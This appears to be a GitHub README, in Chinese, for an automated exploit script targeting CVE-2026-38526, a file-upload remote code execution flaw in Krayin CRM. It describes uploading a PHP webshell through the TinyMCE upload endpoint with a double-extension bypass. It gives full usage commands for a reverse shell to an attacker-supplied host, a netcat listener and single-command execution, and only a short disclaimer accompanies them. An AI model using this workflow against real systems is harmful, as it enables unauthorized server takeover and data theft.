pawpic/CVE-2026-38526-POC
GitHub: pawpic/CVE-2026-38526-POC
Krayin CRM 任意文件上传导致远程代码执行漏洞(CVE-2026-38526)的全自动化 PoC 利用脚本。
Stars: 0 | Forks: 0
# CVE-2026-38526 - Krayin CRM RCE Exploit
**Krayin CRM** (≤ 2.2.x) - 无限制文件上传导致远程代码执行。
此 PoC 利用存在漏洞的 TinyMCE 上传 endpoint (`/admin/tinymce/upload`) 上传 PHP webshell,从而在服务器上执行命令。
## 功能
- 自动处理 CSRF token 并实现全自动登录
- 通过双扩展名 (`shell.png.php`) 绕过上传限制
- 支持 reverse shell(base64 编码)和单条命令执行
- 可靠的 Laravel CSRF token 刷新机制
- 简洁易用
## 环境要求
```
pip3 install requests beautifulsoup4
```
用法
1. Reverse Shell(默认且推荐)
```
python3 exploit.py \
-u http://example.com \
-e user@example.com \
-p "example_pass" \
--lhost YOUR_IP \
--lport 4444
```
2. 单条命令
```
python3 exploit.py \
-u http://example.com \
-e user@example.com \
-p "example_pass" \
-c "whoami"
```
## 选项
| 参数 | 描述 | 是否必填 |
|----------|----------|----------|
| -u, --url | 目标基础 URL | 是 |
| -e, --email | 登录邮箱 | 是 |
| -p, --password | 登录密码 | 是 |
| -c, --cmd | 执行单条命令 | 否 |
| --lhost | 用于 reverse shell 的本机 IP | 是(如果未使用 --cmd) |
| --lport | 监听端口 | 否(默认:4444) |
## 示例工作流
启动监听器:
```
nc -lvnp 4444
```
运行 exploit:
```
python3 exploit.py -u http://target.com -e admin@target.com -p password --lhost IP_ADDR
```
## 免责声明
本 exploit 仅用于教育目的及经授权的渗透测试。在未获得明确许可的情况下,对系统进行未经授权的使用是非法的。
受影响版本
Krayin CRM ≤ 2.2.x
CVE:CVE-2026-38526
作者:Hubert
日期:2026
标签:PoC, WebShell, 文件上传漏洞, 暴力破解, 编程工具, 远程代码执行, 逆向工具